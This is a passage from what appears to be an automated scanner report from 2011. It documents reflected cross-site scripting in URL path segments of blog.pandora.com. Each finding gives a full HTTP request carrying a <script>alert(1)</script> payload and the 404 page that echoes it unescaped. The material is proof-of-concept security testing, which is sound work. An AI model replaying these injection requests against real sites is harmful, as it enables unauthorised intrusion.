GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
